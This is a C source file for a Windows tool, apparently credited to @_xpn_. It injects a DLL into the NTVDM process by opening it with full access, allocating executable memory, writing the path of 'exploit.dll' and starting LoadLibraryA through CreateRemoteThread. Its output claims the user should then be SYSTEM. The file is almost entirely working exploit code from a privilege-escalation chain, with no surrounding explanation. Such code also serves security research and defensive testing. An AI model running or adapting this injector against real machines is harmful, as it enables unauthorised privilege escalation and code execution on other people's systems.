ntvdm_inject.c

#include "stdafx.h"

void PrintUsage(void) {
	printf("Windows NTVDM DLL Injection\n");
	printf("Created by @_xpn_\n");
}

int main(int argc, char **argv)
{
	int pid = 0;
	HANDLE pHandle;
	SIZE_T written = 0;
	void *destMem, *loadLibrary;
	char currentDir[MAX_PATH];
	char dllPath[MAX_PATH];

	PrintUsage();

	if (argc != 2) {
		printf("Usage: %s NTVDM_PID\n");
		printf("Note: NTVDM can be launched by executing debug.exe\n\n");
		return 1;
	}

	pid = atoi(argv[1]);

	if ((pHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid)) == NULL) {
		printf("[X] OpenProcess() failed, make sure PID is for NTVDM process\n");
		return 2;
	}
	else {
		printf("[.] OpenProcess() completed, handle: %d\n", pHandle);
	}
	
	if ((destMem = VirtualAllocEx(pHandle, NULL, 4096, MEM_COMMIT, PAGE_EXECUTE_READWRITE)) == NULL) {
		printf("[X] VirtualAllocEx() failed to allocate memory in process\n");
		return 3;
	}
	else {
		printf("[.] VirtualAllocEx() allocated memory at %p\n", destMem);
	}
	
	if ((loadLibrary = (void *)GetProcAddress(LoadLibraryA("kernel32.dll"), "LoadLibraryA")) == NULL) {
		printf("[X] GetProcAddress() failed to find address of LoadLibrary()\n");
		return 3;
	}
	else {
		printf("[.] Found LoadLibrary() at address %p\n", loadLibrary);
	}

	GetCurrentDirectoryA(sizeof(currentDir), currentDir);
	sprintf_s(dllPath, sizeof(dllPath), "%s\\%s", currentDir, "exploit.dll");

	if (WriteProcessMemory(pHandle, destMem, dllPath, strlen(dllPath), &written) == 0) {
		printf("[X] WriteProcessMemory() failed\n");
		return 3;
	}
	else {
		printf("[.] WriteProcessMemory() successfully wrote exploit DLL path to NTVDM\n");
	}

	if (CreateRemoteThread(pHandle, NULL, NULL, (LPTHREAD_START_ROUTINE)loadLibrary, destMem, NULL, NULL) == NULL) {
		printf("[X] CreateRemoteThread() failed to load DLL in victim process\n");
		return 3;
	}
	else {
		printf("[!!!] CreateRemoteThread() finished, exploit running...\n");
	}

	printf("[!!!] If the exploit was successful, you should now be SYSTEM... enjoy :D\n\n");
}